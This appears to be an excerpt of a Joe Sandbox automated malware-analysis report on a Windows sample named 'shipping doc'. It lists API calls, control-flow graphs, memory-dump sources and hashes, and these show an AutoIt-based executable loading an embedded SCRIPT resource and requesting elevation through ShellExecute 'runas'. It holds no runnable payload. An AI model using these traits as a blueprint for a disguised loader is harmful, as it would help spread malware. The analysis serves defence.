                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                              • API String ID: 3290436268-3101561225
                                                                                              • Opcode ID: 15fa7b3a5f3f2b8f763e8a2a68e85e3192b3dbc00293bae5a84f9207a781e855
                                                                                              • Instruction ID: de9305d697821f3594e13a5629bcbaa7b79e8b227f43828f2d6726f4219b4a97
                                                                                              • Opcode Fuzzy Hash: 15fa7b3a5f3f2b8f763e8a2a68e85e3192b3dbc00293bae5a84f9207a781e855
                                                                                              • Instruction Fuzzy Hash: 1CA1956291A3D0FFCB11C76A7C611997FE47B26360B9A46A9D041A3F72F32446C4CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 661 e42a2-e42ba CreateStreamOnHGlobal 662 e42bc-e42d3 FindResourceExW 661->662 663 e42da-e42dd 661->663 664 e42d9 662->664 665 1235ba-1235c9 LoadResource 662->665 664->663 665->664 666 1235cf-1235dd SizeofResource 665->666 666->664 667 1235e3-1235ee LockResource 666->667 667->664 668 1235f4-123612 667->668 668->664
                                                                                              APIs
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000E50AA,?,?,00000000,00000000), ref: 000E42B2
                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000E50AA,?,?,00000000,00000000), ref: 000E42C9
                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,000E50AA,?,?,00000000,00000000,?,?,?,?,?,?,000E4F20), ref: 001235BE
                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,000E50AA,?,?,00000000,00000000,?,?,?,?,?,?,000E4F20), ref: 001235D3
                                                                                              • LockResource.KERNEL32(000E50AA,?,?,000E50AA,?,?,00000000,00000000,?,?,?,?,?,?,000E4F20,?), ref: 001235E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                              • String ID: SCRIPT
                                                                                              • API String ID: 3051347437-3967369404
                                                                                              • Opcode ID: 3ea487a523da234fa6736711130a50a79d248f190d85455630d409e3670de950
                                                                                              • Instruction ID: 1a6aa8d13f4a16a7d41f6f73cd18b1f126527fa20aff40dfed62c5357f19d95f
                                                                                              • Opcode Fuzzy Hash: 3ea487a523da234fa6736711130a50a79d248f190d85455630d409e3670de950
                                                                                              • Instruction Fuzzy Hash: FD118E70600700BFD7218B66DC48F277BB9EBC5B51F14816DF506E6660DB71DC408A60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 000E2B6B
                                                                                                • Part of subcall function 000E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001B1418,?,000E2E7F,?,?,?,00000000), ref: 000E3A78
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,?,?,001A2224), ref: 00122C10
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?,001A2224), ref: 00122C17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                              • String ID: runas
                                                                                              • API String ID: 448630720-4000483414
                                                                                              • Opcode ID: 3809a007444cb8380210423b4a77d417bfe2a6a0146bac2155b67c9ef83f4193
                                                                                              • Instruction ID: bf9a648a32e917885a911498b37979d16044dc18d6d27d090f53c98d92bc9d66
                                                                                              • Opcode Fuzzy Hash: 3809a007444cb8380210423b4a77d417bfe2a6a0146bac2155b67c9ef83f4193
                                                                                              • Instruction Fuzzy Hash: 0211B4312083C16EC718FF62D855DEEBBA99B95740F94142DF086370A3DF318A898752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,00125222), ref: 0014DBCE
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0014DBDD
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 0014DBEE
                                                                                              • FindClose.KERNEL32(00000000), ref: 0014DBFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2695905019-0
                                                                                              • Opcode ID: a1d3ce39fe46d2b0d2f514d0a0e7bf1445fa7011f5a09c35e376e9c152675aa7
                                                                                              • Instruction ID: 0a24957b546937bc56db1fcf5d05dbeb0b2946d164cc211f3d57f7f5a5ea5ba6
                                                                                              • Opcode Fuzzy Hash: a1d3ce39fe46d2b0d2f514d0a0e7bf1445fa7011f5a09c35e376e9c152675aa7
                                                                                              • Instruction Fuzzy Hash: F2F0A9B0810910A786216BB8AC4D8AA37BD9F03334B50471AF83AC24F0EBB099D486D6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 000ED807
                                                                                              • timeGetTime.WINMM ref: 000EDA07
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000EDB28
                                                                                              • TranslateMessage.USER32(?), ref: 000EDB7B
                                                                                              • DispatchMessageW.USER32(?), ref: 000EDB89
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000EDB9F
                                                                                              • Sleep.KERNEL32(0000000A), ref: 000EDBB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                              • String ID:
                                                                                              • API String ID: 2189390790-0
                                                                                              • Opcode ID: 19199601a98f8c96daaddef44b274b9bc943d98cd8e2128a135fb7b7b9a05fa4
                                                                                              • Instruction ID: 3770b86be4f16ef1cd91eed690568192a93400b391929c7121a08ac8684bbfd1
                                                                                              • Opcode Fuzzy Hash: 19199601a98f8c96daaddef44b274b9bc943d98cd8e2128a135fb7b7b9a05fa4
                                                                                              • Instruction Fuzzy Hash: 3542F330608381EFD738DF25C894BAAB7E1FF45314F54462EE4959B692D774E884CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 000E2D07
                                                                                              • RegisterClassExW.USER32(00000030), ref: 000E2D31
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E2D42
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 000E2D5F
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E2D6F
                                                                                              • LoadIconW.USER32(000000A9), ref: 000E2D85
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E2D94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: a523e1803811daf719b2c4f5d722cccb56fceccbcd2ac916978b9bfbea161170
                                                                                              • Instruction ID: 5ce4c870f5ab5daa8fde393e20ad20d151f44b46caef8a88d478ee00a13d3d58
                                                                                              • Opcode Fuzzy Hash: a523e1803811daf719b2c4f5d722cccb56fceccbcd2ac916978b9bfbea161170
                                                                                              • Instruction Fuzzy Hash: ED21F2B5901348AFDB00DFA4EC99BDDBBB4FB08705F10821AF615A66A0D7B10584CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 302 12065b-12068b call 12042f 305 1206a6-1206b2 call 115221 302->305 306 12068d-120698 call 10f2c6 302->306 312 1206b4-1206c9 call 10f2c6 call 10f2d9 305->312 313 1206cb-120714 call 12039a 305->313 311 12069a-1206a1 call 10f2d9 306->311 322 12097d-120983 311->322 312->311 320 120781-12078a GetFileType 313->320 321 120716-12071f 313->321 326 1207d3-1207d6 320->326 327 12078c-1207bd GetLastError call 10f2a3 CloseHandle 320->327 324 120721-120725 321->324 325 120756-12077c GetLastError call 10f2a3 321->325 324->325 331 120727-120754 call 12039a 324->331 325->311 329 1207d8-1207dd 326->329 330 1207df-1207e5 326->330 327->311 341 1207c3-1207ce call 10f2d9 327->341 334 1207e9-120837 call 11516a 329->334 330->334 335 1207e7 330->335 331->320 331->325 344 120847-12086b call 12014d 334->344 345 120839-120845 call 1205ab 334->345 335->334 341->311 352 12087e-1208c1 344->352 353 12086d 344->353 345->344 351 12086f-120879 call 1186ae 345->351 351->322 354 1208e2-1208f0 352->354 355 1208c3-1208c7 352->355 353->351 359 1208f6-1208fa 354->359 360 12097b 354->360 355->354 358 1208c9-1208dd 355->358 358->354 359->360 361 1208fc-12092f CloseHandle call 12039a 359->361 360->322 364 120963-120977 361->364 365 120931-12095d GetLastError call 10f2a3 call 115333 361->365 364->360 365->364
                                                                                              APIs
                                                                                                • Part of subcall function 0012039A: CreateFileW.KERNELBASE(00000000,00000000,?,00120704,?,?,00000000,?,00120704,00000000,0000000C), ref: 001203B7
                                                                                              • GetLastError.KERNEL32 ref: 0012076F
                                                                                              • __dosmaperr.LIBCMT ref: 00120776
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 00120782
                                                                                              • GetLastError.KERNEL32 ref: 0012078C
                                                                                              • __dosmaperr.LIBCMT ref: 00120795
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001207B5
                                                                                              • CloseHandle.KERNEL32(?), ref: 001208FF
                                                                                              • GetLastError.KERNEL32 ref: 00120931
                                                                                              • __dosmaperr.LIBCMT ref: 00120938
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 682475f32f79990e3f55d56647a2f11804e140684ddf5216d2bc29f0b82a68e2
                                                                                              • Instruction ID: 6ad633e4d8e4fb5f4b69b38eaa75c3b540831cd1151298511d5f75bd22ef393f
                                                                                              • Opcode Fuzzy Hash: 682475f32f79990e3f55d56647a2f11804e140684ddf5216d2bc29f0b82a68e2
                                                                                              • Instruction Fuzzy Hash: 8FA10732A041188FDF1AEF68E8517AE7BB0AB4A320F14025DF8559B3D2D7319D63CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 000E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001B1418,?,000E2E7F,?,?,?,00000000), ref: 000E3A78
                                                                                                • Part of subcall function 000E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000E3379
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000E356A
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0012318D
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001231CE
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00123210
                                                                                              • _wcslen.LIBCMT ref: 00123277
                                                                                              • _wcslen.LIBCMT ref: 00123286
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 98802146-2727554177
                                                                                              • Opcode ID: aa59e03a4375f3c6f7736b7babd83f0323ec900cf53b4bcddcc17ef4ed8875fd
                                                                                              • Instruction ID: b010fc5605dc9a80f80057e2c18662476fed96291775c90aaf8db13e96064622
                                                                                              • Opcode Fuzzy Hash: aa59e03a4375f3c6f7736b7babd83f0323ec900cf53b4bcddcc17ef4ed8875fd
                                                                                              • Instruction Fuzzy Hash: D171A2715043419EC314EF26EC858ABBBE8FF99740F404A2EF555931B1EB749A88CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 000E2B8E
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 000E2B9D
                                                                                              • LoadIconW.USER32(00000063), ref: 000E2BB3
                                                                                              • LoadIconW.USER32(000000A4), ref: 000E2BC5
                                                                                              • LoadIconW.USER32(000000A2), ref: 000E2BD7
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000E2BEF
                                                                                              • RegisterClassExW.USER32(?), ref: 000E2C40
                                                                                                • Part of subcall function 000E2CD4: GetSysColorBrush.USER32(0000000F), ref: 000E2D07
                                                                                                • Part of subcall function 000E2CD4: RegisterClassExW.USER32(00000030), ref: 000E2D31
                                                                                                • Part of subcall function 000E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E2D42
                                                                                                • Part of subcall function 000E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 000E2D5F
                                                                                                • Part of subcall function 000E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E2D6F
                                                                                                • Part of subcall function 000E2CD4: LoadIconW.USER32(000000A9), ref: 000E2D85
                                                                                                • Part of subcall function 000E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E2D94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: 4a2aa5ef948934f0c1c5d12359921e10e9f25f2177a83c07f1a0b0ec1efc2039
                                                                                              • Instruction ID: 533c9428abad1b694f9ce4e34632a865a5413e6a12b186dc797b90d396c6191d
                                                                                              • Opcode Fuzzy Hash: 4a2aa5ef948934f0c1c5d12359921e10e9f25f2177a83c07f1a0b0ec1efc2039
                                                                                              • Instruction Fuzzy Hash: 28212C71E00354BFDB109FA6EC65AAD7FF4FB48B60F55411AE504A6AB0E7B10580CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 443 e3170-e3185 444 e3187-e318a 443->444 445 e31e5-e31e7 443->445 446 e318c-e3193 444->446 447 e31eb 444->447 445->444 448 e31e9 445->448 451 e3199-e319e 446->451 452 e3265-e326d PostQuitMessage 446->452 449 122dfb-122e23 call e18e2 call fe499 447->449 450 e31f1-e31f6 447->450 453 e31d0-e31d8 DefWindowProcW 448->453 489 122e28-122e2f 449->489 454 e321d-e3244 SetTimer RegisterWindowMessageW 450->454 455 e31f8-e31fb 450->455 457 e31a4-e31a8 451->457 458 122e7c-122e90 call 14bf30 451->458 460 e3219-e321b 452->460 459 e31de-e31e4 453->459 454->460 464 e3246-e3251 CreatePopupMenu 454->464 461 122d9c-122d9f 455->461 462 e3201-e3214 KillTimer call e30f2 call e3c50 455->462 465 e31ae-e31b3 457->465 466 122e68-122e77 call 14c161 457->466 458->460 482 122e96 458->482 460->459 474 122da1-122da5 461->474 475 122dd7-122df6 MoveWindow 461->475 462->460 464->460 471 e31b9-e31be 465->471 472 122e4d-122e54 465->472 466->460 480 e31c4-e31ca 471->480 481 e3253-e3263 call e326f 471->481 472->453 476 122e5a-122e63 call 140ad7 472->476 483 122dc6-122dd2 SetFocus 474->483 484 122da7-122daa 474->484 475->460 476->453 480->453 480->489 481->460 482->453 483->460 484->480 485 122db0-122dc1 call e18e2 484->485 485->460 489->453 493 122e35-122e48 call e30f2 call e3837 489->493 493->453
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000E316A,?,?), ref: 000E31D8
                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,000E316A,?,?), ref: 000E3204
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000E3227
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000E316A,?,?), ref: 000E3232
                                                                                              • CreatePopupMenu.USER32 ref: 000E3246
                                                                                              • PostQuitMessage.USER32(00000000), ref: 000E3267
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: e6645690a54b33f92d51c3cf1390ff9798e31bf1c55daf422b3ee17624306388
                                                                                              • Instruction ID: e15c5af08c2acff9a071e7a0ec8beab98d1627cd054cff1fa5f18af2280651f3
                                                                                              • Opcode Fuzzy Hash: e6645690a54b33f92d51c3cf1390ff9798e31bf1c55daf422b3ee17624306388
                                                                                              • Instruction Fuzzy Hash: 08417C31204284BFDB281B799D2DBFD3EA6E745340F44026DFA45B75A2DB718AC097A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 499 118d45-118d55 500 118d57-118d6a call 10f2c6 call 10f2d9 499->500 501 118d6f-118d71 499->501 517 1190f1 500->517 503 118d77-118d7d 501->503 504 1190d9-1190e6 call 10f2c6 call 10f2d9 501->504 503->504 507 118d83-118dae 503->507 522 1190ec call 1127ec 504->522 507->504 510 118db4-118dbd 507->510 513 118dd7-118dd9 510->513 514 118dbf-118dd2 call 10f2c6 call 10f2d9 510->514 515 1190d5-1190d7 513->515 516 118ddf-118de3 513->516 514->522 521 1190f4-1190f9 515->521 516->515 520 118de9-118ded 516->520 517->521 520->514 524 118def-118e06 520->524 522->517 528 118e23-118e2c 524->528 529 118e08-118e0b 524->529 532 118e4a-118e54 528->532 533 118e2e-118e45 call 10f2c6 call 10f2d9 call 1127ec 528->533 530 118e15-118e1e 529->530 531 118e0d-118e13 529->531 536 118ebf-118ed9 530->536 531->530 531->533 534 118e56-118e58 532->534 535 118e5b-118e79 call 113820 call 1129c8 * 2 532->535 561 11900c 533->561 534->535 569 118e96-118ebc call 119424 535->569 570 118e7b-118e91 call 10f2d9 call 10f2c6 535->570 538 118fad-118fb6 call 11f89b 536->538 539 118edf-118eef 536->539 552 119029 538->552 553 118fb8-118fca 538->553 539->538 542 118ef5-118ef7 539->542 542->538 546 118efd-118f23 542->546 546->538 550 118f29-118f3c 546->550 550->538 555 118f3e-118f40 550->555 557 11902d-119045 ReadFile 552->557 553->552 558 118fcc-118fdb GetConsoleMode 553->558 555->538 562 118f42-118f6d 555->562 564 1190a1-1190ac GetLastError 557->564 565 119047-11904d 557->565 558->552 560 118fdd-118fe1 558->560 560->557 566 118fe3-118ffd ReadConsoleW 560->566 567 11900f-119019 call 1129c8 561->567 562->538 568 118f6f-118f82 562->568 571 1190c5-1190c8 564->571 572 1190ae-1190c0 call 10f2d9 call 10f2c6 564->572 565->564 573 11904f 565->573 574 118fff GetLastError 566->574 575 11901e-119027 566->575 567->521 568->538 579 118f84-118f86 568->579 569->536 570->561 576 119005-11900b call 10f2a3 571->576 577 1190ce-1190d0 571->577 572->561 583 119052-119064 573->583 574->576 575->583 576->561 577->567 579->538 588 118f88-118fa8 579->588 583->567 585 119066-11906a 583->585 592 119083-11908e 585->592 593 11906c-11907c call 118a61 585->593 588->538 598 119090 call 118bb1 592->598 599 11909a-11909f call 1188a1 592->599 604 11907f-119081 593->604 605 119095-119098 598->605 599->605 604->567 605->604
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7fcfafd4a8cc19b437b2b7055bbc65c22fbb3ae506858dcb0c7ae8765cdef44e
                                                                                              • Instruction ID: 421d62302a6595d244dbc35d20dd4b86a8237355523a3bbd336e1818a9a5d62d
                                                                                              • Opcode Fuzzy Hash: 7fcfafd4a8cc19b437b2b7055bbc65c22fbb3ae506858dcb0c7ae8765cdef44e
                                                                                              • Instruction Fuzzy Hash: 6FC1F374A04249AFDB29DFA8C851BEDBBB4BF1D310F0441A9F464A7392C77099C2CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
